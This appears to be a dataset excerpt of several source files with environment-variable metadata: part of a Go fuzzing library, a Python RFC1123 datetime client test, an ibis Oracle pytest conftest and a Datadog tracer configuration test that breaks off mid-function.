// We prefer not to loop much (mostly for perf & mem usage), including if '0' or 0x0 appear during minimization.
switch {
case loopPlan == '0' || loopPlan < 128:
loopCount = 1
case loopPlan < 224:
loopCount = 4
case loopPlan < 250:
loopCount = 16
case loopPlan < 254:
loopCount = 64
default:
loopCount = 256
}
if loopCount >= 16 {
// Disable spin for larger loop counts.
// This is partly to help with performance, and more debatable,
// the types of concurrency bugs that benefit from a large loop count
// might tend to benefit from starting parallel loops at the same time without
// an artificial delay between starts.
allowSpin = false
}
return allowSpin, loopCount
}
// calcParallelPair interprets the bytes from our Plan to indicate when we
// should start and stop parallel execution for a pair of calls.
func calcParallelPair(parallelPlan byte, execCallLen int) (startParallelIndex, stopParallelIndex int) {
// startParallelIndex is index of the first exeCall of the pair to run in parallel.
// In general, we want to favor (1) sequential and (2) putting the parallelism as far towards the
// end of a call sequence as we can, including so that new coverage which might have
// been first *observed* with a logical race (e.g., two racing stores that are not a data race)
// is minimized down to sequential behavior when possible.
// We offset from '0' to take advantage of current cmd/go minimizing behavior
// of trying '0', then '1', then '2', ... for each byte when minimizing:
// '0' is handled above, which we want to mean serial
// '1' we handle here, which we want to mean the last and second-to-last are in parallel.
// '2' means second-to-last and third-to-last in parallel, and so on.
// We subtract 1 from the right-side mod operand because the last execCall would be a no-op as startParallelIndex,
// and hence there are only len(execCalls)-1 interesting values for startParallelIndex here.
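// For example (illustrative numbers): with 4 execCalls and parallelPlan == '1',
// offset is 0, so stopParallelIndex is 3 and startParallelIndex is 2,
// i.e. only the last two calls run in parallel.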
offset := int(parallelPlan-'1') % (execCallLen - 1)
stopParallelIndex = execCallLen - 1 - offset
startParallelIndex = stopParallelIndex - 1
if startParallelIndex < 0 {
panic("bug computing startParallelIndex")
}
if stopParallelIndex >= execCallLen {
panic("bug computing stopParallelIndex")
}
return startParallelIndex, stopParallelIndex
}
// calcParallelN interprets the bytes from our Plan to indicate when we
// should start and stop parallel execution, which will be up to N calls in parallel from the end
// of the plan.
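// For example (illustrative numbers): with 4 execCalls and parallelPlan == 226,
// offset is 226 % 3 == 1, so startParallelIndex is 1 and stopParallelIndex is 3,
// i.e. the last three calls run in parallel.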
func calcParallelN(parallelPlan byte, execCallLen int) (startParallelIndex, stopParallelIndex int) {
offset := int(parallelPlan) % (execCallLen - 1)
startParallelIndex = execCallLen - 2 - offset
stopParallelIndex = execCallLen - 1
if startParallelIndex < 0 {
panic("bug computing startParallelIndex")
}
if stopParallelIndex >= execCallLen {
panic("bug computing stopParallelIndex")
}
return startParallelIndex, stopParallelIndex
}
func (fz *Fuzzer) callStep(ec execCall) []reflect.Value {
// TODO: don't need all these args eventually
for _, arg := range ec.args {
if arg.useReturnVal {
// Wait until the return value is ready to be read.
<-arg.slot.ch
}
}
// Prepare the reflect.Value arg list we will use to call the func.
// This contains the input values we previously created.
reflectArgs := []reflect.Value{}
for i := range ec.args {
v := *ec.args[i].val
// For map, pointer, or slice, we disallow nil values to
// be passed in as args by creating a new object here if nil. Note that we are not setting up
// for example a map completely -- just making sure it is not nil.
// In older versions, this arg nil check was emitted as code that someone could choose to delete.
// We could return and skip this call (closer to older emitted logic), but
// if we do that, we need to handle the outputslot broadcast channels for this call in case someone
// is waiting or will be waiting on a return value from this call.
// TODO: this is likely useful for Ptr, but less sure how useful this is for the other types here.
// TODO: test this better. inputs/race/race.go tests this for Ptr, but this is slightly annoying to test
// because fz.Fill avoids this. This occurs for example when the plan decides to reuse a call return
// value and that function under test returns a nil. In that case, fz.Fill is not the one creating the value.
// TODO: if we keep this, consider showing equivalent logic in the emitted repro logic, or maybe only when it matters.
// TODO: consider skipping this instead, and emit the nil check logic in the repro.
// TODO: make this configurable, including because people no longer have option of deleting the emitted nil checks.
switch v.Kind() {
case reflect.Ptr:
if v.IsNil() {
v = reflect.New(v.Type().Elem())
}
case reflect.Slice:
if v.IsNil() {
v = reflect.MakeSlice(v.Type(), 0, 0)
}
case reflect.Map:
if v.IsNil() {
v = reflect.MakeMapWithSize(v.Type(), 0)
}
case reflect.Interface:
// TODO: consider checking Interface too. Or better to keep passing the code under test a nil?
}
reflectArgs = append(reflectArgs, v)
}
// Call the user's func.
ret := ec.fv.Call(reflectArgs)
if len(ret) != ec.fv.Type().NumOut() {
panic("fzgen: mismatch on return value count")
}
if len(ret) != len(ec.outputSlots) {
panic(fmt.Sprintf("fzgen: for execCall %v, mismatch on return value count vs. execCall.outputSlots count: %+v, %+v", ec.name, ret, ec.outputSlots))
}
// Check to see if any of these return results are needed by a subsequent call.
if fz.execState != nil {
for i := 0; i < ec.fv.Type().NumOut(); i++ {
if ec.outputSlots[i].needed {
// at least one subsequent call will use this return value.
outV := ret[i]
// sanity check types match
outT := ec.fv.Type().Out(i)
if outT != outV.Type() || outT != ec.outputSlots[i].typ {
panic("fzgen: mismatch on return value types")
}
// store this return value in the right outputSlot for later use by a subsequent call.
slot := ec.outputSlots[i]
slot.val = outV
// Broadcast that the slot.val is ready to be read.
close(slot.ch)
}
}
}
// fmt.Println(ret)
// fmt.Printf("ret: %T %v\n", ret[0], ret[0])
return ret
}
func (fz *Fuzzer) prepareStep(ec *execCall, allowReturnValReuse bool, fillFunc func(...interface{})) []argument {
// TODO: additional sanity checking on types?
fv := ec.fv
ft := fv.Type()
// Build up a list of arguments that are filled in with fresh values, or via reusing prior values.
args := []argument{}
for i := 0; i < ft.NumIn(); i++ {
// Create or find an input value
var arg argument
inT := ft.In(i)
// Track if we will need to create a new arg via reflect.New (vs. reusing an input or output).
createNew := true
// Check if our plan indicates we should try to reuse an input or output.
if fz.execState != nil && len(ec.planCall.ArgSource) > i {
switch ec.planCall.ArgSource[i].SourceType % 3 {
case 0:
// Reuse an argument, if one can be found.
inputs, ok := fz.execState.reusableInputs[inT]
if ok && len(inputs) > 0 {
// TODO: take index from plan eventually; for simple tests, fine to take first
inV := inputs[0]
// We want the Elem() for use below in Call, because
// inV represents a pointer to the type we want (e.g. from reflect.New),
// so we do the indirect via inV.Elem() to get our original type.
inElem := inV.Elem()
arg = argument{
useReturnVal: false,
typ: inV.Type(),
val: &inElem,
}
createNew = false
}
case 1:
if allowReturnValReuse {
// Mark that we will use a return value from an earlier step, if one can be found.
outputSlots, ok := fz.execState.outputSlots[inT]
if ok && len(outputSlots) > 0 {
// We found a return value.
// TODO: BUG: Note that it could be from any step, including one which happens
// after us.
// TODO: take index from plan eventually; for simple tests, fine to take first
outputSlot := outputSlots[0]
outputSlot.needed = true
arg = argument{
useReturnVal: true,
typ: inT,
val: &outputSlot.val,
slot: outputSlot,
}
createNew = false
}
}
}
}
if createNew {
// Create a new instance.
// Note: NOT doing anything special if inT represents a pointer type (including not calling Elem here)
inV := reflect.New(inT)
// inIntf is an interface with a pointer as its value, for example, *string if inT.Kind() is string
inIntf := inV.Interface()
// Do the work of filling in this value
fillFunc(inIntf)
inElem := inV.Elem()
arg = argument{
useReturnVal: false,
typ: inV.Type(),
val: &inElem,
}
if fz.execState != nil {
// This is a new arg, store for later.
// (A reused input arg would have already been stored for later use).
fz.execState.reusableInputs[arg.typ] = append(fz.execState.reusableInputs[arg.typ], arg.val)
// TODO: simple pop for now
if len(fz.execState.reusableInputs[arg.typ]) > 10 {
fz.execState.reusableInputs[arg.typ] = fz.execState.reusableInputs[arg.typ][1:]
}
}
}
// Add this now useful value to our list of input args for this call.
args = append(args, arg)
}
// Finally, add all of the return types for this call to our
// set of all known return value types for all of our steps seen so far.
// A later call might use one of our return values as an input arg.
if fz.execState != nil {
for i := 0; i < fv.Type().NumOut(); i++ {
outT := fv.Type().Out(i)
slot := &outputSlot{
needed: false,
typ: outT,
val: reflect.Value{},
ch: make(chan struct{}),
returnValCall: ec.index,
returnValArg: i,
}
fz.execState.outputSlots[outT] = append(fz.execState.outputSlots[outT], slot)
// execCall.outputSlots is a slice containing slots for all return values for
// the call, with slice elements ordered by the return value order of the call.
ec.outputSlots = append(ec.outputSlots, slot)
// panic(fmt.Sprintf("for type %v, appending to ec.outputSlots: %#v", outT, ec.outputSlots))
}
}
return args
}
func mustFunc(obj interface{}) reflect.Value {
fv := reflect.ValueOf(obj)
if fv.Kind() != reflect.Func {
panic(fmt.Sprintf("fzgen: Step.Func is not of type func. [kind: %v %%T: %T value: %v]", fv.Kind(), fv, fv))
}
return fv
}
var spinCount int
func spin() {
// TODO: tune duration of spin down?
// It's going to depend on the funcs under test and the hardware and so on, but in one test with a logical race that set up a data race:
// 1<<16 vs. no spin moved reproducibility from ~80% to ~95%
// 1<<20 moved reproducibility to ~100%
var i int
for i < 1<<18 {
i++
}
spinCount += i
}
var (
debugPrintRepro bool
debugPrintPlan bool
debugPlanVersion int = 2
)
func emitPlan(pl plan.Plan) {
litter.Config.Compact = false
// TODO: Probably use litter.Options object
fmt.Println("PLAN:")
litter.Dump(pl)
fmt.Println()
}
// emitBasicRepro is the start of a more complete standalone reproducer
// creation, which ultimately could be a standalone _test.go file
// that does not have any dependency on fzgen/fuzzer or testing.F.
//
// Example current output, showing:
// - literals for new args filled in by fz.Fill
// - literals for reused args
// - temporary variables when an output val is wired to a later input arg.
//
// Output:
//
// Fuzz_MySafeMap_Load(
// [4]uint8{0,0,0,0},
// )
// __fzCall2Retval1 := Fuzz_MySafeMap_Load(
// [4]uint8{0,0,0,0},
// )
// Fuzz_MySafeMap_Store(
// [4]uint8{0,0,0,0},
// __fzCall2Retval1,
// )
func emitBasicRepro(calls []execCall, sequential bool, startParallelIndex int, stopParallelIndex int) {
litter.Config.Compact = true
// TODO: Probably use litter.Options object
// TODO: litter.Config.HomePackage = "<local pkg>"
for i, ec := range calls {
parallelCall := false
if !sequential && i >= startParallelIndex && i <= stopParallelIndex {
parallelCall = true
}
// TODO: consider emitting spin?
// if i > startParallelIndex && i <= stopParallelIndex {
// fmt.Print("\n\tspin()\n")
// }
if parallelCall && i == startParallelIndex {
if i != 0 {
fmt.Println()
}
fmt.Print("\tvar wg sync.WaitGroup\n")
fmt.Printf("\twg.Add(%d)\n\n", stopParallelIndex-startParallelIndex+1)
fmt.Print("\t// Execute next steps in parallel.\n")
}
if parallelCall {
fmt.Print("\tgo func() {\n")
fmt.Print("\t\tdefer wg.Done()\n")
}
// start emitting the actual call invocation.
if parallelCall {
fmt.Print("\t\t")
} else {
fmt.Print("\t")
}
// check if we are reusing any of the return values from this call.
showReturn := false
for _, slot := range ec.outputSlots {
if slot.needed {
showReturn = true
break
}
}
if showReturn {
// emit assignment to return values, which can look like:
// __fzCall2Retval1, _, _ :=
for i, slot := range ec.outputSlots {
if i > 0 {
fmt.Print(", ")
}
if !ec.outputSlots[i].needed {
fmt.Print("_")
} else {
// one-based temp variable names for friendlier output.
fmt.Printf("__fzCall%dRetval%d", slot.returnValCall+1, slot.returnValArg+1)
}
}
fmt.Print(" := ")
}
// emit the call and its args, which might just be literals, or
// might include one or more temp variables for a return value.
fmt.Printf("%s(\n", ec.name)
for _, arg := range ec.args {
if parallelCall {
fmt.Print("\t")
}
if !arg.useReturnVal {
fmt.Printf("\t\t%s,\n", litter.Sdump(arg.val.Interface()))
} else {
// one-based temp variable names for friendlier output.
fmt.Printf("\t\t__fzCall%dRetval%d,\n", arg.slot.returnValCall+1, arg.slot.returnValArg+1)
}
}
// close out the invocation of this call.
if parallelCall {
fmt.Print("\t\t)\n")
fmt.Print("\t}()\n")
} else {
fmt.Print("\t)\n")
}
if parallelCall && i == stopParallelIndex {
fmt.Print("\twg.Wait()\n")
if i < len(calls)-1 {
fmt.Printf("\n\t// Resume sequential execution.\n")
}
}
}
fmt.Println()
}
func init() {
fzgenDebugParse()
}
func fzgenDebugParse() {
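// FZDEBUG holds comma-separated key=value flags, e.g. FZDEBUG=repro=1,plan=1,planversion=2.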
debug := strings.Split(os.Getenv("FZDEBUG"), ",")
for _, f := range debug {
if strings.HasPrefix(f, "repro=") {
debugReproVal, err := strconv.Atoi(strings.TrimPrefix(f, "repro="))
if err != nil || debugReproVal > 1 {
panic("unexpected repro value in FZDEBUG env var")
}
if debugReproVal == 1 {
debugPrintRepro = true
}
}
if strings.HasPrefix(f, "plan=") {
debugPlanVal, err := strconv.Atoi(strings.TrimPrefix(f, "plan="))
if err != nil || debugPlanVal > 1 {
panic("unexpected repro value in FZDEBUG env var")
}
if debugPlanVal == 1 {
debugPrintPlan = true
}
}
if strings.HasPrefix(f, "planversion=") {
v, err := strconv.Atoi(strings.TrimPrefix(f, "planversion="))
if err != nil || v > 2 {
panic("unexpected planversion value in FZDEBUG env var")
}
// Assign to the package-level variable; using := here would only shadow it.
debugPlanVersion = v
}
}
}
|
[
"\"FZDEBUG\""
] |
[] |
[
"FZDEBUG"
] |
[]
|
["FZDEBUG"]
|
go
| 1 | 0 | |
test/vanilla/AcceptanceTests/asynctests/test_datetime_rfc.py
|
# --------------------------------------------------------------------------
#
# Copyright (c) Microsoft Corporation. All rights reserved.
#
# The MIT License (MIT)
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to
# deal in the Software without restriction, including without limitation the
# rights to use, copy, modify, merge, publish, distribute, sublicense, and/or
# sell copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING
# FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS
# IN THE SOFTWARE.
#
# --------------------------------------------------------------------------
import unittest
import subprocess
import sys
import isodate
import tempfile
import json
from datetime import date, datetime, timedelta
import os
from os.path import dirname, pardir, join, realpath
cwd = dirname(realpath(__file__))
log_level = int(os.environ.get('PythonLogLevel', 30))
tests = realpath(join(cwd, pardir, "Expected", "AcceptanceTests"))
sys.path.append(join(tests, "BodyDateTimeRfc1123"))
from msrest.serialization import Deserializer
from msrest.exceptions import DeserializationError
from bodydatetimerfc1123.aio import AutoRestRFC1123DateTimeTestService
import pytest
class TestDateTimeRfc(object):
@pytest.mark.asyncio
async def test_datetime_rfc(self):
client = AutoRestRFC1123DateTimeTestService(base_url="http://localhost:3000")
assert await client.datetimerfc1123.get_null() is None
with pytest.raises(DeserializationError):
await client.datetimerfc1123.get_invalid()
with pytest.raises(DeserializationError):
await client.datetimerfc1123.get_underflow()
with pytest.raises(DeserializationError):
await client.datetimerfc1123.get_overflow()
await client.datetimerfc1123.get_utc_lowercase_max_date_time()
await client.datetimerfc1123.get_utc_uppercase_max_date_time()
await client.datetimerfc1123.get_utc_min_date_time()
max_date = isodate.parse_datetime("9999-12-31T23:59:59.999999Z")
await client.datetimerfc1123.put_utc_max_date_time(max_date)
min_date = isodate.parse_datetime("0001-01-01T00:00:00Z")
await client.datetimerfc1123.put_utc_min_date_time(min_date)
|
[] |
[] |
[
"PythonLogLevel"
] |
[]
|
["PythonLogLevel"]
|
python
| 1 | 0 | |
third_party/ibis/ibis_oracle/tests/conftest.py
|
# Copyright 2020 Google Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import os
import pytest
import ibis
import third_party.ibis.ibis_oracle.api
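# Connection settings come from the IBIS_TEST_ORACLE_* environment variables,
# falling back to the OL* variables and finally to placeholder strings.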
OL_HOST = os.environ.get(
'IBIS_TEST_ORACLE_HOST', os.environ.get('OLHOST','host')
)
OL_PORT = os.environ.get(
'IBIS_TEST_ORACLE_PORT', os.environ.get('OLPORT','port')
)
OL_USER = os.environ.get(
'IBIS_TEST_ORACLE_USER', os.environ.get('OLUSER', 'username')
)
OL_PASS = os.environ.get(
'IBIS_TEST_ORACLE_PASSWORD', os.environ.get('OLPASSWORD', 'password')
)
IBIS_TEST_ORACLE_DB = os.environ.get(
'IBIS_TEST_ORACLE_DATABASE', os.environ.get('OLDATABASE', 'database_name')
)
IBIS_TEST_ORACLE_protocol = os.environ.get(
'IBIS_TEST_ORACLE_PROTOCOL', os.environ.get('OLPROTOCOL', 'protocol')
)
def _random_identifier(suffix):
return '__ibis_test_{}_{}'.format(suffix, ibis.util.guid())
@pytest.fixture(scope='session')
def con():
return third_party.ibis.ibis_oracle.api.connect(
host=OL_HOST,
port=OL_PORT,
user=OL_USER,
password=OL_PASS,
database=IBIS_TEST_ORACLE_DB,
protocol=IBIS_TEST_ORACLE_protocol,
)
@pytest.fixture(scope='module')
def db(con):
return con.database()
@pytest.fixture(scope='module')
def alltypes(db):
return db.functional_alltypes
@pytest.fixture(scope='module')
def df(alltypes):
return alltypes.execute()
@pytest.fixture(scope='module')
def at(alltypes):
return alltypes.op().sqla_table
@pytest.fixture(scope='module')
def intervals(con):
return con.table("intervals")
@pytest.fixture
def translate():
from third_party.ibis.ibis_oracle.compiler import OracleDialect
dialect = OracleDialect()
context = dialect.make_context()
return lambda expr: dialect.translator(expr, context).get_result()
@pytest.fixture
def temp_table(con) -> str:
"""
Return a temporary table name.
Parameters
----------
con : third_party.ibis.ibis_oracle.compiler.OracleDialect
Yields
------
name : string
Random table name for temporary use.
"""
name = _random_identifier('table')
try:
yield name
finally:
con.drop_table(name, force=True)
|
[] |
[] |
[
"OLPORT",
"IBIS_TEST_ORACLE_HOST",
"OLDATABASE",
"OLHOST",
"IBIS_TEST_ORACLE_USER",
"OLUSER",
"IBIS_TEST_ORACLE_PASSWORD",
"IBIS_TEST_ORACLE_PROTOCOL",
"OLPASSWORD",
"IBIS_TEST_ORACLE_DATABASE",
"OLPROTOCOL",
"IBIS_TEST_ORACLE_PORT"
] |
[]
|
["OLPORT", "IBIS_TEST_ORACLE_HOST", "OLDATABASE", "OLHOST", "IBIS_TEST_ORACLE_USER", "OLUSER", "IBIS_TEST_ORACLE_PASSWORD", "IBIS_TEST_ORACLE_PROTOCOL", "OLPASSWORD", "IBIS_TEST_ORACLE_DATABASE", "OLPROTOCOL", "IBIS_TEST_ORACLE_PORT"]
|
python
| 12 | 0 | |
ddtrace/tracer/option_test.go
|
// Unless explicitly stated otherwise all files in this repository are licensed
// under the Apache License Version 2.0.
// This product includes software developed at Datadog (https://www.datadoghq.com/).
// Copyright 2016 Datadog, Inc.
package tracer
import (
"io"
"io/ioutil"
"math"
"net"
"net/http"
"net/http/httptest"
"os"
"path/filepath"
"runtime"
"strings"
"testing"
"time"
"gopkg.in/DataDog/dd-trace-go.v1/internal/globalconfig"
"gopkg.in/DataDog/dd-trace-go.v1/internal/traceprof"
"github.com/stretchr/testify/assert"
"github.com/stretchr/testify/require"
)
func withTransport(t transport) StartOption {
return func(c *config) {
c.transport = t
}
}
func withTickChan(ch <-chan time.Time) StartOption {
return func(c *config) {
c.tickChan = ch
}
}
// testStatsd asserts that the given statsd.Client can successfully send metrics
// to a UDP listener located at addr.
func testStatsd(t *testing.T, cfg *config, addr string) {
client := cfg.statsd
require.Equal(t, addr, cfg.dogstatsdAddr)
udpaddr, err := net.ResolveUDPAddr("udp", addr)
require.NoError(t, err)
conn, err := net.ListenUDP("udp", udpaddr)
require.NoError(t, err)
defer conn.Close()
client.Count("name", 1, []string{"tag"}, 1)
require.NoError(t, client.Close())
done := make(chan struct{})
buf := make([]byte, 4096)
n := 0
go func() {
n, _ = io.ReadAtLeast(conn, buf, 1)
close(done)
}()
select {
case <-done:
// OK
case <-time.After(1 * time.Second):
require.Fail(t, "No data was flushed.")
}
assert.Contains(t, string(buf[:n]), "name:1|c|#lang:go")
}
func TestAutoDetectStatsd(t *testing.T) {
t.Run("default", func(t *testing.T) {
testStatsd(t, newConfig(), net.JoinHostPort(defaultHostname, "8125"))
})
t.Run("socket", func(t *testing.T) {
if strings.HasPrefix(runtime.GOOS, "windows") {
t.Skip("Unix only")
}
if testing.Short() {
return
}
dir, err := ioutil.TempDir("", "socket")
if err != nil {
t.Fatal(err)
}
addr := filepath.Join(dir, "dsd.socket")
defer func(old string) { defaultSocketDSD = old }(defaultSocketDSD)
defaultSocketDSD = addr
uaddr, err := net.ResolveUnixAddr("unixgram", addr)
if err != nil {
t.Fatal(err)
}
conn, err := net.ListenUnixgram("unixgram", uaddr)
if err != nil {
t.Fatal(err)
}
defer conn.Close()
conn.SetDeadline(time.Now().Add(5 * time.Second))
cfg := newConfig()
require.Equal(t, cfg.dogstatsdAddr, "unix://"+addr)
cfg.statsd.Count("name", 1, []string{"tag"}, 1)
buf := make([]byte, 17)
n, err := conn.Read(buf)
if err != nil {
t.Fatal(err)
}
require.Contains(t, string(buf[:n]), "name:1|c|#lang:go")
})
t.Run("env", func(t *testing.T) {
defer func(old string) { os.Setenv("DD_DOGSTATSD_PORT", old) }(os.Getenv("DD_DOGSTATSD_PORT"))
os.Setenv("DD_DOGSTATSD_PORT", "8111")
testStatsd(t, newConfig(), net.JoinHostPort(defaultHostname, "8111"))
})
t.Run("agent", func(t *testing.T) {
t.Run("default", func(t *testing.T) {
srv := httptest.NewServer(http.HandlerFunc(func(w http.ResponseWriter, _ *http.Request) {
w.Write([]byte(`{"statsd_port":0}`))
}))
defer srv.Close()
cfg := newConfig(WithAgentAddr(strings.TrimPrefix(srv.URL, "http://")))
testStatsd(t, cfg, net.JoinHostPort(defaultHostname, "8125"))
})
t.Run("port", func(t *testing.T) {
srv := httptest.NewServer(http.HandlerFunc(func(w http.ResponseWriter, _ *http.Request) {
w.Write([]byte(`{"statsd_port":8999}`))
}))
defer srv.Close()
cfg := newConfig(WithAgentAddr(strings.TrimPrefix(srv.URL, "http://")))
testStatsd(t, cfg, net.JoinHostPort(defaultHostname, "8999"))
})
})
}
func TestLoadAgentFeatures(t *testing.T) {
t.Run("zero", func(t *testing.T) {
t.Run("disabled", func(t *testing.T) {
assert.Zero(t, newConfig(WithLambdaMode(true)).agent)
})
t.Run("unreachable", func(t *testing.T) {
if testing.Short() {
return
}
srv := httptest.NewServer(http.HandlerFunc(func(w http.ResponseWriter, _ *http.Request) {
w.WriteHeader(http.StatusInternalServerError)
}))
defer srv.Close()
assert.Zero(t, newConfig(WithAgentAddr("127.9.9.9:8181")).agent)
})
t.Run("StatusNotFound", func(t *testing.T) {
srv := httptest.NewServer(http.HandlerFunc(func(w http.ResponseWriter, _ *http.Request) {
w.WriteHeader(http.StatusNotFound)
}))
defer srv.Close()
assert.Zero(t, newConfig(WithAgentAddr(strings.TrimPrefix(srv.URL, "http://"))).agent)
})
t.Run("error", func(t *testing.T) {
srv := httptest.NewServer(http.HandlerFunc(func(w http.ResponseWriter, _ *http.Request) {
w.Write([]byte("Not JSON"))
}))
defer srv.Close()
assert.Zero(t, newConfig(WithAgentAddr(strings.TrimPrefix(srv.URL, "http://"))).agent)
})
})
t.Run("OK", func(t *testing.T) {
srv := httptest.NewServer(http.HandlerFunc(func(w http.ResponseWriter, _ *http.Request) {
w.Write([]byte(`{"endpoints":["/v0.6/stats"],"feature_flags":["a","b"],"client_drop_p0s":true,"statsd_port":8999}`))
}))
defer srv.Close()
cfg := newConfig(WithAgentAddr(strings.TrimPrefix(srv.URL, "http://")))
assert.True(t, cfg.agent.DropP0s)
assert.Equal(t, cfg.agent.StatsdPort, 8999)
assert.EqualValues(t, cfg.agent.featureFlags, map[string]struct{}{
"a": struct{}{},
"b": struct{}{},
})
assert.True(t, cfg.agent.Stats)
assert.True(t, cfg.agent.HasFlag("a"))
assert.True(t, cfg.agent.HasFlag("b"))
})
t.Run("discovery", func(t *testing.T) {
defer func(old string) { os.Setenv("DD_TRACE_FEATURES", old) }(os.Getenv("DD_TRACE_FEATURES"))
os.Setenv("DD_TRACE_FEATURES", "discovery")
srv := httptest.NewServer(http.HandlerFunc(func(w http.ResponseWriter, _ *http.Request) {
w.Write([]byte(`{"endpoints":["/v0.6/stats"],"client_drop_p0s":true,"statsd_port":8999}`))
}))
defer srv.Close()
cfg := newConfig(WithAgentAddr(strings.TrimPrefix(srv.URL, "http://")))
assert.True(t, cfg.agent.DropP0s)
assert.True(t, cfg.agent.Stats)
assert.Equal(t, cfg.agent.StatsdPort, 8999)
})
}
func TestTracerOptionsDefaults(t *testing.T) {
t.Run("defaults", func(t *testing.T) {
assert := assert.New(t)
c := newConfig()
assert.Equal(float64(1), c.sampler.(RateSampler).Rate())
assert.Equal("tracer.test", c.serviceName)
assert.Equal("localhost:8126", c.agentAddr)
assert.Equal("localhost:8125", c.dogstatsdAddr)
assert.NotNil(c.httpClient)
assert.Equal(defaultClient, c.httpClient)
})
t.Run("http-client", func(t *testing.T) {
c := newConfig()
assert.Equal(t, defaultClient, c.httpClient)
client := &http.Client{}
WithHTTPClient(client)(c)
assert.Equal(t, client, c.httpClient)
})
t.Run("analytics", func(t *testing.T) {
t.Run("option", func(t *testing.T) {
defer globalconfig.SetAnalyticsRate(math.NaN())
assert := assert.New(t)
assert.True(math.IsNaN(globalconfig.AnalyticsRate()))
newTracer(WithAnalyticsRate(0.5))
assert.Equal(0.5, globalconfig.AnalyticsRate())
newTracer(WithAnalytics(false))
assert.True(math.IsNaN(globalconfig.AnalyticsRate()))
newTracer(WithAnalytics(true))
assert.Equal(1., globalconfig.AnalyticsRate())
})
t.Run("env/on", func(t *testing.T) {
os.Setenv("DD_TRACE_ANALYTICS_ENABLED", "true")
defer os.Unsetenv("DD_TRACE_ANALYTICS_ENABLED")
defer globalconfig.SetAnalyticsRate(math.NaN())
newConfig()
assert.Equal(t, 1.0, globalconfig.AnalyticsRate())
})
t.Run("env/off", func(t *testing.T) {
os.Setenv("DD_TRACE_ANALYTICS_ENABLED", "kj12")
defer os.Unsetenv("DD_TRACE_ANALYTICS_ENABLED")
defer globalconfig.SetAnalyticsRate(math.NaN())
newConfig()
assert.True(t, math.IsNaN(globalconfig.AnalyticsRate()))
})
})
t.Run("dogstatsd", func(t *testing.T) {
t.Run("default", func(t *testing.T) {
tracer := newTracer()
c := tracer.config
assert.Equal(t, c.dogstatsdAddr, "localhost:8125")
})
t.Run("env-host", func(t *testing.T) {
os.Setenv("DD_AGENT_HOST", "my-host")
defer os.Unsetenv("DD_AGENT_HOST")
tracer := newTracer()
c := tracer.config
assert.Equal(t, c.dogstatsdAddr, "my-host:8125")
})
t.Run("env-port", func(t *testing.T) {
os.Setenv("DD_DOGSTATSD_PORT", "123")
defer os.Unsetenv("DD_DOGSTATSD_PORT")
tracer := newTracer()
c := tracer.config
assert.Equal(t, c.dogstatsdAddr, "localhost:123")
})
t.Run("env-both", func(t *testing.T) {
os.Setenv("DD_AGENT_HOST", "my-host")
os.Setenv("DD_DOGSTATSD_PORT", "123")
defer os.Unsetenv("DD_AGENT_HOST")
defer os.Unsetenv("DD_DOGSTATSD_PORT")
tracer := newTracer()
c := tracer.config
assert.Equal(t, c.dogstatsdAddr, "my-host:123")
})
t.Run("env-env", func(t *testing.T) {
os.Setenv("DD_ENV", "testEnv")
defer os.Unsetenv("DD_ENV")
tracer := newTracer()
c := tracer.config
assert.Equal(t, "testEnv", c.env)
})
t.Run("option", func(t *testing.T) {
tracer := newTracer(WithDogstatsdAddress("10.1.0.12:4002"))
c := tracer.config
assert.Equal(t, c.dogstatsdAddr, "10.1.0.12:4002")
})
})
t.Run("env-agentAddr", func(t *testing.T) {
os.Setenv("DD_AGENT_HOST", "trace-agent")
defer os.Unsetenv("DD_AGENT_HOST")
tracer := newTracer()
c := tracer.config
assert.Equal(t, "trace-agent:8126", c.agentAddr)
})
t.Run("override", func(t *testing.T) {
os.Setenv("DD_ENV", "dev")
defer os.Unsetenv("DD_ENV")
assert := assert.New(t)
env := "production"
tracer := newTracer(WithEnv(env))
c := tracer.config
assert.Equal(env, c.env)
})
t.Run("trace_enabled", func(t *testing.T) {
t.Run("default", func(t *testing.T) {
tracer := newTracer()
c := tracer.config
assert.True(t, c.enabled)
})
t.Run("override", func(t *testing.T) {
os.Setenv("DD_TRACE_ENABLED", "false")
defer os.Unsetenv("DD_TRACE_ENABLED")
tracer := newTracer()
c := tracer.config
assert.False(t, c.enabled)
})
})
t.Run("other", func(t *testing.T) {
assert := assert.New(t)
tracer := newTracer(
WithSampler(NewRateSampler(0.5)),
WithAgentAddr("ddagent.consul.local:58126"),
WithGlobalTag("k", "v"),
WithDebugMode(true),
WithEnv("testEnv"),
)
c := tracer.config
assert.Equal(float64(0.5), c.sampler.(RateSampler).Rate())
assert.Equal("ddagent.consul.local:58126", c.agentAddr)
assert.NotNil(c.globalTags)
assert.Equal("v", c.globalTags["k"])
assert.Equal("testEnv", c.env)
assert.True(c.debug)
})
t.Run("env-tags", func(t *testing.T) {
os.Setenv("DD_TAGS", "env:test, aKey:aVal,bKey:bVal, cKey:")
defer os.Unsetenv("DD_TAGS")
assert := assert.New(t)
c := newConfig()
assert.Equal("test", c.globalTags["env"])
assert.Equal("aVal", c.globalTags["aKey"])
assert.Equal("bVal", c.globalTags["bKey"])
assert.Equal("", c.globalTags["cKey"])
dVal, ok := c.globalTags["dKey"]
assert.False(ok)
assert.Equal(nil, dVal)
})
t.Run("profiler-endpoints", func(t *testing.T) {
t.Run("default", func(t *testing.T) {
c := newConfig()
assert.False(t, c.profilerEndpoints)
})
t.Run("override", func(t *testing.T) {
os.Setenv(traceprof.EndpointEnvVar, "true")
